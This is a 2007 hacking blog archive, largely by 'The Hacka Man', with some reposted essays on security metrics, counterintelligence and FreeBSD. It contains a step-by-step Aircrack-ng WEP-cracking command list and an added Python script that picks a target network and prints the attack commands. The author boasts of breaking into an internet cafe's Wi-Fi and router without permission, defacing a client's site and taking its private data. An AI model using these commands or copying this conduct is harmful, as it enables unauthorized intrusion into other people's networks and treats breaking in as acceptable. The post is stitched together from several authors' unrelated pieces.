Wednesday, 31 October 2007

Paypal CRMgateway XSS

PayPal used to suffer a lot from phishing attacks in the past, and I bet even today the bad guys are finding ways to exploit this hole to get more money. I was again playing around and I managed to find an XSS hole in PayPal's crmgateway. Well, it seems like PayPal never learned their lesson from the past and still allows injections. Anyway, I had already cancelled my account with PayPal because of their bad service and the unforgivable mistake they made. Good luck, PayPal.



The Hacka Man

A Plea to the Worthies

You may have seen stories like Cybersecurity Experts Collaborate with subtitles like A think tank has tapped several heavyweight security experts to staff a commission that will advise the president. That story continues:

The Center for Strategic and International Studies (CSIS) wants the commission to come up with a list of recommendations that the new president who takes office in January 2009 "can pick up and run with right away," said James Lewis, director of the CSIS Technology and Public Policy Program. The commission, made up of 32 cybersecurity experts, plans to finish its work by the end of 2008.

I am fairly confident that nothing of value will come from this group, but there is one task which could completely reverse my opinion. Rather than wasting time on recommendations that will probably be ignored, how about taking a step in a direction that will have real impact: security metrics. That's right. Spend the first day (or two, if you are a slow reader or can't sit still for long periods) reading Andy Jaquith's book. Next, and this is the crucial part:

Figure out how to play and score the game before you pretend to think you can improve the score.

What does this mean? Just a few ideas include:

  • Propose definitions for security, risk, threat, vulnerability, inside threat, external threat, and all the other words we use yet upon which we never agree. Hold hearings and invite real security people (not just digital security people) to express their views.

  • Propose some metrics and see how other operations define success. Hold hearings on the results of that process.

  • Apply metrics to some real organizations and gain a baseline set of numbers. Repeat the process at determined time intervals. Try to identify correlations and if possible causations. Be anonymous if necessary, but use a real methodology and not the self-selection applied by CSI/FBI and others.


Do you see where I am going here? At the end of the process we could have a framework for seeing just what is happening. I defy anyone to tell me just how bad or good our digital security situation is right now. Some say the sky is falling, others say we're happy! happy!, others say we're just as secure as we need to be to continue limping along. It is a proper role for a panel of worthies to help figure out how the game is played and then what the score is. It is a waste of time to make recommendations before those basic steps have been taken.

Hacking and Cracking Wireless

One day after intruding into the router, I remembered that my colleague Mark had compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy when doing a wireless audit and saves you the time needed to read the manuals. Use it in your next wireless audit. Thank you, Mark, for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor   OR
airmon-ng start rausb0 <channel>


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwconfig ath0 channel <n>
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether <new MAC address>
ifconfig ath0 up

or use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9 <device>
===================
D-Link DWL-G122

aireplay-ng -9 <device> (if this doesn't work it means no AP on the same channel was found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure both cards are on the same channel (channel hopping does not seem to work on the D-Link DWL-G122???)
iwlist <device> channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng <device> (find out first the BSSID and channel of interest)

Then capture packets on that particular channel:

airodump-ng --channel <channel> --bssid <bssid> -w dumpfile <device> (ath0 or rausb0)

Notes: capture full packets when using the PTW attack (don't dump IVs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to the AP first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association (re-authenticate every 6000 s, one packet per auth, keepalive every 10 s):
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for WEP cracking, PTW method):
if RXQ in the airodump-ng window is > 90 then expect #/s = 200+ (watch #Data, it counts the captured IVs)

aireplay-ng --arpreplay -b <AP BSSID> -h <our MAC> <device>

Deauthentication (to capture a WPA handshake or reveal a hidden SSID)
Fake Authentication (to authenticate to the AP in case it is needed before we can inject)



#############################################################
WEP CRACKING

Using the PTW attack (version 0.9+ only). Packets must be ARP (from arp-replay):

aircrack-ng -z -b <bssid> dumpfile*.cap
40-bit key: roughly 20,000 IVs
104-bit key: roughly 40,000 IVs

Normal attack (without -z):
-n 64 (test for 40-bit WEP, i.e. a 64-bit key); remove -n for 104-bit WEP (128-bit key, the default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig <device> rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man
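
As an added example (not part of Mark's list, the post above, or the Aircrack-ng project), here is a small Python helper for the "watch #Data" step of the WEP workflow. It reads the CSV file that airodump-ng writes next to the capture when run with -w (dumpfile-01.csv), picks the WEP network with the most captured IVs, compares the count against the rough 20,000 / 40,000 PTW figures quoted in the list, and prints the command lines from the list with the BSSID, channel and ESSID filled in. The column layout is assumed to be the one airodump-ng writes; the sample CSV rows, MAC addresses and interface name are constructed for illustration.

```python
"""Pick a WEP target from airodump-ng's CSV output and judge PTW readiness.

Added example, not code from the original post or the Aircrack-ng project.
Assumes the column layout airodump-ng writes to <prefix>-01.csv with -w:
an access-point table, a blank line, then a station table.  The sample
data, MAC addresses and interface name below are constructed.
"""
import csv
import io

# Rough IV counts the post quotes for aircrack-ng's PTW attack (-z).
PTW_IVS_NEEDED = {40: 20_000, 104: 40_000}

# Constructed sample: two WEP networks with enough IVs for at least a 40-bit
# key, one WPA network, and one WEP network with a hidden (empty) ESSID.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1A:6D:F8:40:D0, 2007-10-31 12:00:01, 2007-10-31 12:41:12,  6,  54, WEP , WEP , OPN, -41,     2410,    43120,   0.  0.  0.  0,   6, CAFE01, 
00:0F:B5:12:34:56, 2007-10-31 12:00:03, 2007-10-31 12:41:10, 11,  11, WEP , WEP , OPN, -67,     1800,    25300,   0.  0.  0.  0,   5, GUEST, 
00:13:10:AB:CD:EF, 2007-10-31 12:00:02, 2007-10-31 12:41:11,  1,  54, WPA , TKIP, PSK, -55,     2200,        0,   0.  0.  0.  0,   7, OFFICE1, 
00:18:F8:00:11:22, 2007-10-31 12:00:05, 2007-10-31 12:41:09,  6,  54, WEP , WEP , OPN, -70,      900,    12000,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
06:14:6C:4C:B9:7C, 2007-10-31 12:05:00, 2007-10-31 12:41:00, -50,      300, 00:1A:6D:F8:40:D0, CAFE01
"""


def parse_access_points(text):
    """Return one dict per access-point row; stops at the station table."""
    aps = []
    in_ap_table = False
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue                      # blank separator lines
        head = row[0].strip()
        if head == "BSSID":               # header of the access-point table
            in_ap_table = True
            continue
        if head == "Station MAC":         # start of the station table
            break
        if not in_ap_table or len(row) < 14:
            continue                      # ignore anything unexpected
        aps.append({
            "bssid": head.upper(),
            "channel": int(row[3].strip()),
            "privacy": row[5].strip(),    # "WEP", "WPA", "WPA2", "OPN", ...
            "ivs": int(row[10].strip()),  # the "# IV" column (#Data in the live view)
            "essid": row[13].strip(),     # empty when the SSID is hidden
        })
    return aps


def ptw_status(ap):
    """(enough IVs for a 40-bit key?, enough IVs for a 104-bit key?).

    Non-WEP networks always get (False, False).  The thresholds are rough,
    and PTW also needs full ARP frames in the capture, not an IV-only dump.
    """
    if ap["privacy"] != "WEP":
        return (False, False)
    return (ap["ivs"] >= PTW_IVS_NEEDED[40], ap["ivs"] >= PTW_IVS_NEEDED[104])


def pick_target(aps):
    """The WEP network with the most IVs so far, or None if there is none."""
    wep = [ap for ap in aps if ap["privacy"] == "WEP"]
    return max(wep, key=lambda ap: ap["ivs"]) if wep else None


def build_commands(ap, iface, our_mac, prefix="dumpfile"):
    """The list's WEP workflow with the target filled in, in execution order:
    lock the capture to the channel/BSSID, fake-authenticate, ARP-replay to
    generate IVs, then PTW-crack the full capture files.  For a hidden SSID a
    deauth is prepended, because fake authentication needs the ESSID (-e)."""
    b, ch, essid = ap["bssid"], ap["channel"], ap["essid"]
    cmds = [f"airodump-ng --channel {ch} --bssid {b} -w {prefix} {iface}"]
    if not essid:
        cmds.append(f"aireplay-ng -0 5 -a {b} {iface}   # reveal hidden SSID, then fill in -e")
        essid = "<SSID>"
    cmds += [
        f"aireplay-ng -1 0 -e '{essid}' -a {b} -h {our_mac} {iface}",
        f"aireplay-ng -3 -b {b} -h {our_mac} {iface}",
        f"aircrack-ng -z -b {b} {prefix}*.cap",
    ]
    return cmds


if __name__ == "__main__":
    aps = parse_access_points(SAMPLE_CSV)
    for ap in aps:
        ready40, ready104 = ptw_status(ap)
        print(f"{ap['bssid']} ch{ap['channel']:>2} {ap['privacy']:<4} "
              f"IVs={ap['ivs']:>6} PTW 40-bit={ready40} 104-bit={ready104} "
              f"ESSID={ap['essid'] or '<hidden>'}")
    target = pick_target(aps)
    print("\n".join(build_commands(target, "ath0", "06:14:6C:4C:B9:7C")))
```

Run it against the real dumpfile-01.csv by reading the file into parse_access_points instead of SAMPLE_CSV. The IV figures are only a guide: aircrack-ng -z can succeed earlier or need more, and if the capture was taken with an IV-only dump the PTW attack will not work regardless of the count.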

Hacked into a Wireless Router.

These days, I am just mad crazy. Hacking, hacking and still hacking. Basically I am dead bored and decided to see how far I can go with my hacking skills. Today, after finishing auditing a customer, I wanted to check my email as I needed to send out an urgent email. I saw an internet cafe with a Wi-Fi connection; however, encryption was on. Within a few minutes, I managed to crack their password and hacked straight into their router. With that, I managed to use BitTorrent by doing port forwarding and download my favourite TV show. Well, it wasn't as thrilling as the first time I hacked into a wireless router, but still, it was a hack. How did I do it? Just by observation and some trial and error, and there you go.



The Hacka Man

Tuesday, 30 October 2007

Web Application Security with Joe Walker

This is a great SlideShare from Joe Walker with all the new hacking techniques that involve Ajax and Web 2.0. Its content is simple yet very entertaining and easily understandable. Check it out, guys:



http://getahead.org/blog/joe/

The Hacka Man

Free Audit, Is it Real??

OK, I am providing free audits for those who need my help in securing their applications or networks, and read properly: I am NOT charging a single cent for my effort in helping you. The reason for doing so is that I am giving back to the community that once helped me get where I am today. I remember I was hacking like nobody's business back in the day with trojans, port scanning, exploits, etc. I was very young then and indeed very enthusiastic about all sorts of hacking. Today, because of my busy work schedule and commitments, I tend to have less time for reading or research. However, I am still pretty much involved in the security community when it comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public-facing web applications, and I actually managed to test their sites and show them what I had found. Of course, I cannot reveal any of those clients I did before, but trust me, some of them are huge organizations and of course some are my friends.

To get a free audit, i need the following details:

1. Prove that you are the owner of the site or network.

2. Personal details of yourself.

3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.

4. If you are an individual, i would require you to give me a call to my mobile or skype. Send me an email first at hackathology@gmail.com

5. If there should be any meetup, prepare a Non-Disclosure Agreement for signing if required, and we will discuss the Scope of Work.

I cannot guarantee that I will have the time to test and deliver on time for each and every customer if request traffic is high; however, I will do my best to deliver what I promised. Also, if the scope gets larger, the delay will be longer; it all depends. Don't forget I have a day job and am doing you a favour. Lastly, should there be any changes to the audit details, I will update them here on my blog.

The Hacka Man

Monday, 29 October 2007

Wake Up Corporate America

I am constantly hammered for downplaying the "inside threat" and focusing on external attackers. Several months ago I noted the Month of Owned Corporations as an example of enterprises demonstrating security failures exploited by outsiders. Thanks to Bots Rise in the Enterprise, it appears the external threat is finally getting more attention:

Who says bots are just for home PCs? Turns out bot infections in the enterprise may be more widespread than originally thought.

Botnet operators traditionally have recruited "soft" targets -- home users with little or no security -- and the assumption was that the more heavily fortressed enterprise was mostly immune. But incident response teams and security researchers on the front lines say they are witnessing significant bot activity in enterprises as well...

Rick Wesson, CEO of Support Intelligence, says the rate of botnet infection in the enterprise isn't necessarily increasing -- it just hasn't been explored in detail until recently. "What's changing is the perception. It's been underestimated, underreported, and underanalyzed," Wesson says. "Corporate America is in as bad shape as a user at home."

Wesson says his firm, which does security monitoring, instantly finds dozens of bot-infected client machines in an enterprise customer's network when it starts studying its traffic. "We find dozens of bot-compromised systems off the bat. The longer we stay in [there], the more we find."
(emphasis added)

Wake up, corporate America (and the world). When you open your eyes you're not going to like what you see, but dealing with the truth is better than pretending everything's ok.

Detecting BroadVision Applications. Are they secure?

Are proprietary applications secure? Well, I guess yes and no. Security researchers are constantly researching flaws in those applications, and only if a bug is reported will the company take action to secure their loopholes. I am currently auditing a BroadVision application, and what a surprise I got from my results. I am not supposed to reveal anything, but let me tell you, for a critical application like this, I am not sure if the customer is using an old version of BroadVision or it was simply not checked for sanitization. I could basically do pretty much anything I wanted with that application and create havoc. Too bad I can't show anything here, but trust me, if you guys get a chance to audit a BroadVision application, you will be surprised by the kind of flaws you find. It's basically like opening a can of worms, waiting for someone to feed on it.

Well, at first I wasn't sure it was a BroadVision application; however, after some research and observation of the HTTP headers, this is what I got:

POST http://example.com/bvsn/bvcom/en/server/whereto.jsp?BV_SessionID=NNNN1809204881.10923774158NNNN&BV_EngineID=nnndaoplghjkiihcfklcfkmdgohdgih.0&BV_UseBVCookie=yes HTTP/1.0

The killer signature here is the parameter names BV_SessionID and BV_EngineID. If you see these anywhere in a URL or in an HTTP header, you have more or less nailed down a BroadVision application. Of course there are some other indicators, like checking for the .do extension; however, that wasn't seen during the audit. Google for those two parameter names and you will see what I mean. I am now signing off here and going back for another round of the audit. I am going to pretty much cripple the whole application this time round.

The Hacka Man

Injection Vectors, Are you up for it?

Recently, I have been doing a lot of web penetration tests and I realised that most of them suffer from injection flaws. Well, some can be deadly and some were just pretty minor. Well, it doesn't matter how severe the injection point is; if your site can be injected, it means that there is still some sanitizing and input validation work which needs to be followed up. Whenever I perform a penetration test on a huge organization, scanners are always deemed useless and I have to do it manually with a list of checks I have. Well, I managed to download a list of injection vectors from my friend Andres, and that certainly helped me save time on googling for attack vectors. For those who do web penetration tests, this will be very useful and will save you hours and hours of looking, reading or searching around for information.

****************Start of the injection list*********************************















*****************************END*****************************************************

The Hacka Man

Saturday, 27 October 2007

An Important Lesson, Passive Enumeration with Paterva

I am about to be assigned to a very exciting project, and one of the most important elements of hacking is passive enumeration. I mean, to bring down an organization or their networks, passive enumeration is definitely a must! This weekend I was scouring around for effective tools that would allow me to perform my search much faster and in a more logical and graphical manner, and I happened to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. You can basically search for a person, DNS name, website, email, etc., and it will return results of what a person had visited, the sites he visited, the words he used, etc. Of course, instead of searching for a person, you can also perform searches for an organization. I know people are going to say that this can also be done with Google dorking. Well, that's absolutely true; Google dorking is so much more powerful, with more explosive results. However, not everyone is an expert in that area, and I mean this is only the surface of passive enumeration. To go deeper, you would of course require certain skills like Google dorking. I am pretty happy with Paterva because of its simplicity and the ability to produce results in a more systematic manner. Try it for yourself.

http://maltego1.paterva.com/maltego-classic.html

http://www.paterva.com/web/Maltego



The Hacka Man

Thursday, 25 October 2007

Citrix Hacking

A few weeks ago, pdp released an article about Citrix hacking and it actually caught my attention. I read through a total of 4 of pdp's posts and also wirepair's whitepaper on hacking Citrix. Overall it was a basic yet interesting article and actually gave me an idea of how to start enumerating and hacking Citrix. Well, for my next trick, when I am about to audit Citrix soon, I will start employing the techniques that were discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust the Citrix application is and how it can handle certain payloads. Since Citrix is not taking security seriously according to wirepair's article, I would not hesitate to publish any flaws I find. With that being said, of course I would give them a chance to see how their response is.

The Hacka Man

Wednesday, 24 October 2007

Checkpwd 2.00 A12 released

Alexander Kornbrust of Red Database Security has just released the much anticipated checkpwd Oracle password cracking tool. This release has many improvements over the previous releases. Some of those include:

* support for Oracle 11g passwords
* support for APEX passwords (1.4-3.0.1)
* collect passwords from the database
* collect password candidates from the database
* option not to display the oracle password in command line
* crack passwords from the password history
* crack role passwords
* save checkpwd default configuration in a configuration file
* read username and password hashes from a file

Well, personally I had tried version 1.21 months ago and it wasn't bad after all. And now comes version 2? You bet it will be so much more interesting to test out the new features and see how the tool produces its results. Weeks ago, THC, a German underground hacking community, released an Oracle 11g password cracker and I must admit that I haven't tried it yet, but now Alex has incorporated Oracle Database 11g password cracking abilities into checkpwd 2.00.

For those who don't know, Alex is a world-renowned Oracle security expert. He is constantly reporting Oracle bugs to Oracle and has published a lot of whitepapers and given talks at conferences regarding Oracle security. I met him once in Dubai and I must say he is a humble and patient person with amazing Oracle security knowledge. To find out more, check him out at the following links:

http://www.red-database-security.com

http://blog.red-database-security.com

The Hacka Man

Are You Secure? Prove It.

Are you secure? Prove it. These five words form the core of my recent thinking on the digital security scene. Let me expand "secure" to mean the definition I provided in my first book: Security is the process of maintaining an acceptable level of perceived risk. I defined risk as the probability of suffering harm or loss. You could expand my five word question into are you operating a process that maintains an acceptable level of perceived risk?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of the answer as well.

For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it.

So, are you secure? Prove it.

  1. Yes. Then, crickets (i.e., silence for you non-imaginative folks.) This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact.

  2. Yes, we have product X, Y, Z, etc. deployed. This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

  3. Yes, we are compliant with regulation X. Regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real evidence. However, I have not seen any compliance assessments which measure anything of operational relevance.

  4. Yes, we have logs indicating we prevented attacks X, Y, and Z. This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. Sure, logs indicate what was stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism?

  5. Yes, we do not have any indications that our systems are acting outside their expected usage patterns. Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of an asset, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

  6. Yes, we do not have any indications that our systems are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and memory-based evidence for signs of violations. This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the asset. You must have trustworthy monitoring systems in order to trust that an asset is "secure." If this is really close, why isn't it correct?

  7. Yes, we do not have any indications that our systems are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and memory-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat). Here you see the reason why number 6 was insufficient. If you assumed that number 6 was ok, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat.


Incidentally, this post explains why deploying a so-called IPS does nothing for ensuring "security." Of course, you can demonstrate that it blocked attacks X, Y, and Z. But, how can you be sure it didn't miss something?

If you want to spend the least amount of money to take the biggest step towards Magnificent Number 7, you should implement Network Security Monitoring.

Microsoft, Explain Threats to Microsoft

The Microsoft Malware Protection Center recently published their third Security Intelligence Report. The front page of the report says

An in-depth perspective on software vulnerabilities and exploits, malicious code threats, and potentially unwanted software, focusing on the first half of 2007

Inside it continues:

This report provides an in-depth perspective on software vulnerabilities (both in Microsoft software and third-party software), software exploits (for which there is a related MSRC bulletin), malicious software, and potentially unwanted software. The lists below summarize the key points from each section of the report...

The number of disclosures of new software vulnerabilities across the industry continues to be in the thousands...


Contrast that proper use of the word vulnerabilities in those excerpts with the incorrect use of the word threat in the quotes I noted in Someone Please Explain Threats to Microsoft:

As you go about filling in the threat model threat list, it’s important to consider the consequences of entering threats and mitigations. While it can be easy to find threats, it is important to realize that all threats have real-world consequences for the development team...

When we’re threat modeling, we should ensure that we’ve identified as many of the potential threats as possible (even if you think they’re trivial). At a minimum, the threats we list that we chose to ignore will remain in the document to provide guidance for the future.


In that excerpt, all uses of the word threat should be replaced with the word vulnerability, with possible exception of the term "threat modeling." In reality it should be "attack modeling," but in all other cases Microsoft is clearly talking about discovering holes/flaws/problems in their software, i.e., vulnerabilities.

So, it seems that the people who have the big security picture -- those who write the Microsoft Security Intelligence Reports -- know the difference between a threat and a vulnerability. The developers who focus on Microsoft's software -- those exercising the Microsoft Security Development Lifecycle -- are using "threat" when they should be saying "vulnerability."

It would be good for the SIR people to talk to the SDLC people. Without that coordination Microsoft's developers will continue to view the security problem incorrectly, and by extension, so will the customers who look to Microsoft for intellectual guidance.

On a related note, I was happy to see the latest SIR available as a .pdf.

FreeBSD 7.0 Developments

I am happy to announce that progress is being made towards the release of FreeBSD 7.0. This announcement says the release cycles for FreeBSD 7.0 and 6.3 have begun. The first 7.0-BETA1 .iso's you might want to test on a fresh system have been published. The announcement says "Instructions on using FreeBSD Update to perform a binary upgrade from FreeBSD 6.x to 7.0-BETA1 will be provided via the freebsd-stable list when available."

The FreeBSD 7.0 release schedule is available, and it shows FreeBSD 7.0 is scheduled for publication on 17 Dec 07. I would love to see this happen, but it's likely to take place about a month later. However, given the time between now and December, it's possible 7.0 will arrive by the end of the year. It looks like the todo list is rather small.

While researching this story I found Bruce Mah's FreeBSD Release Documentation Snapshot Page. A large amount of documentation for each release is published there.

When available I will probably use 7.0 in production. I had no problem with 6.0 in production. This is a departure from the experience of 5.0 and 5.1. I didn't transition from the 4.x line in production until 5.2.1 was released.

Sunday, 21 October 2007

Counterintelligence and the Cyber Threat

Friday I attended an open symposium hosted by the Office of the National Counterintelligence Executive (ONCIX). It was titled Counterintelligence and the Cyber Threat and featured speakers and panels from government, law enforcement, industry, legal, and academic organizations. I attended as a representative of my company because our CSO, Frank Taylor, participated in the industry panel.

If you're not familiar with the term counterintelligence, let me reproduce a section from the ONCIX Web site:

Counterintelligence is the business of identifying and dealing with foreign intelligence threats to the United States. Its core concern is the intelligence services of foreign states and similar organizations of non-state actors, such as transnational terrorist groups. Counterintelligence has both a defensive mission — protecting the nation's secrets and assets against foreign intelligence penetration — and an offensive mission — finding out what foreign intelligence organizations are planning to better defeat their aims.

I also recommend reading the National Counterintelligence Strategy of the United States, 2007 (.pdf) which states:

Our adversaries -- foreign intelligence services, terrorists, foreign criminal enterprises and cyber intruders -- use overt, covert, and clandestine activities to exploit and undermine US national security interests. Counterintelligence is one of several instruments of national power that can thwart such activities, but its effectiveness depends in many respects on coordination with other elements of government and with the private sector.

During the Cold War, our nation's adversaries gained access to vital secrets of the most closely guarded institutions of our national security establishment and penetrated virtually all organizations of the US intelligence and defense communities. The resulting losses produced grave damage to our national security in terms of secrets compromised, intelligence sources degraded, and lives lost, and would have been catastrophic had we been at war.
(emphasis added)

Minor note 1: if we were not at war during the "Cold War," then why is it called a "War"? I believe the people who died fighting would call it a war.

Minor note 2: foreign intelligence services, terrorists, and foreign criminal enterprises are all specific parties. "Cyber intruders" are more often one of those previous parties. Those who perform digital attacks but do not fall into one of those three categories are usually script kiddies or recreational hackers, and should not be explicitly mentioned as counterintelligence targets. My guess is the report considers cyber-instantiated threats to be serious enough to somehow mention explicitly, but not enough intellectual rigor was applied to this sentence (like the Cold War section).

Major note: does the section about penetrating virtually all organizations of the US intelligence and defense communities surprise you? When I attended Air Force intelligence school in 1996-1997, one of our first instructors said:

"Most, if not all of the classified material you will see in your career has already been compromised. However, we have to act as if it's not."

I remembered thinking "What?!?" With hindsight, the more I hear about spies found inside government agencies, the more I understand that statement.

I found the symposium fascinating, so I'd like to share a few thoughts. Dr. Joel Brenner, the National Counterintelligence Executive, provided plenty of noteworthy comments. He said that counterintelligence is not security.

  • A security person sees a hole in a fence and wants to patch it.

  • A CI person sees a hole in a fence and wants to understand who created it, how it is being abused, and if it can be turned into an asset to use against the adversary.


Dr. Brenner said about 140 foreign intelligence surveillance organizations currently target the United States. Three strategic issues are at play:

  1. Threats to sovereign (US) networks, especially in the cyber domain. Dr. Brenner said There is growing acceptance that we face a cyber counterintelligence problem, not a security problem. I agree with this, and will have more to say about it in a future blog entry. He stressed the alteration attack (rather than the disclosure or destruction attacks) as being the major problem facing US networks.

  2. Acquisition risk, i.e., supply chain risks. Dr. Brenner said we need technically literate lawyers and policymakers to address these risks.

  3. Collaboration, or the lack thereof. Dr. Brenner notes that our current "cooperation model" is a function of our "classification model," resulting in an antiquated system that serves no one well.


One of the most interesting comments was this:

Industry talks risk management but they really do risk acceptance, not risk mitigation.

How true that is!

Chris Inglis, Deputy Director of the NSA and a fellow USAFA grad, used a term I liked with regard to fighting the cyber adversary. He said we need to outmaneuver the adversary, not solve security problems. I love this because it implies "security" can't be "solved," and it provides a reason to review maneuver warfare as a way to counter the adversary.

John McClurg, Vice President for security at Honeywell, described his "validated data" approach to obtaining business buy-in for security initiatives. He collects data to support a security program and presents it to managers as a means to justify his work. This sounds a lot like showing evidence that a business unit is owned or about to be owned. I like this idea and my work with NSM would help provide such data.

Scott O'Neal, Chief, Computer Intrusion Section, Cyber Division, FBI, said "The adversary is clearly ahead of security. This is a fact we have to accept." This echoes statements I made earlier this year and at other times. The FBI addresses intrusions through three points of view: CT (counterterrorism), CI (counterintelligence) and criminal.

I'll have more to say on this subject in the months ahead.

Results from Hacking a huge organization

The other night I was auditing one of the customers here in Singapore. It was a huge organization with a massive workforce and manpower. Normally, huge organizations tend to give people the impression that they must be secure, because either they have enough internal people to do the patching or they must be doing some kind of upgrading work every now and then to keep their servers or networks in compliance with the government authority.

The results from my audit showed that life isn't a bed of roses. Multiple servers suffer from DoS and buffer overflow vulnerabilities, and one of them even allowed me to escalate to admin privileges. Well, the results were really astonishing for such a reputable organization, and everything was under my control. Of course, I managed to capture screenshots of all that I did and wrote a report to the management. I am wondering what they will do about it. They could either pray hard that no one attacks them and start patching, or expect the worst, where they could be brought down any time, any day.

One of the coolest things I did during the audit was the defacement of their website. Personally, I had never defaced a website before till that day. It was great seeing a big organization's website carrying your own selected message or picture, definitely tarnishing their reputation, and the feeling was just too ecstatic. Of course, I had to wrap it up fast by taking a screenshot of it and restoring their site back to normal, or I would be screwed. The one last thing I observed and found out was that they were using a very old operating system where most of their crucial data was residing. It was exhilarating as I was poking my way in to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and send it to the customer. I just want to see what the response is going to be.

The Hacka Man

Saturday, 20 October 2007

Russian Business Network

This week Brian Krebs of Security Fix wrote Shadowy Russian Firm Seen as Conduit for Cybercrime, Taking on the Russian Business Network, Mapping the Russian Business Network, and The Russian Business Network Responds. These are great articles, that, at the very least, bring a true threat to a wider audience. This Slashdot post featured a helpful thread providing some technical details on the network itself. If you would like to try identifying some of the networks involved, my post Routing Enumeration might be helpful. Searches via RIPE could also be illuminating.

While researching this post I found a few other incredible resources. First, there's a blog -- rbnexploit.blogspot.com -- that started last month. It's exclusively about RBN. Second, I found Nicholas Albright's blog, which covers botnets. Third, there's an absolutely amazing series of articles by Scott Berinato. They are lengthy but definitely worth reading.

Friday, 19 October 2007

Short update on audit

For those of you who are waiting for the results of the audit: because of the things I found and the sheer volume of report writing I am doing, I will only update the findings next week when I finish the report. Sorry for the wait, but thanks for understanding.

The Hacka Man

Thursday, 18 October 2007

e... singapore, re-evaluate your website!

Well, I am roughly 10 mins from starting the audit, but anyway, I would love to talk about e... singapore. I heard quite a few bad things about e... singapore, and I remember while I was in Dubai, I was asking them for a job, but in the end they voided my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... I have no grudges against e..., but frankly speaking, as an MSS now trying to expand their business into the IS field, I am issuing a challenge against them. By just browsing their websites, I am pretty sure that they can be Own3d! From my guess, they could easily be using IIS 5 or 6, and of this I can be sure by just testing one of their functions, without scanning their website. As for owning them, I'm pretty sure they tightened up most of the holes, EXCEPT for one. All in all, if they want to step into the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when their own site is at risk????? e..., get your internal auditors to re-evaluate the e... website or get me at NO cost to help you do the job.

The Hacka Man

ScanAlert, Hacker Safe?


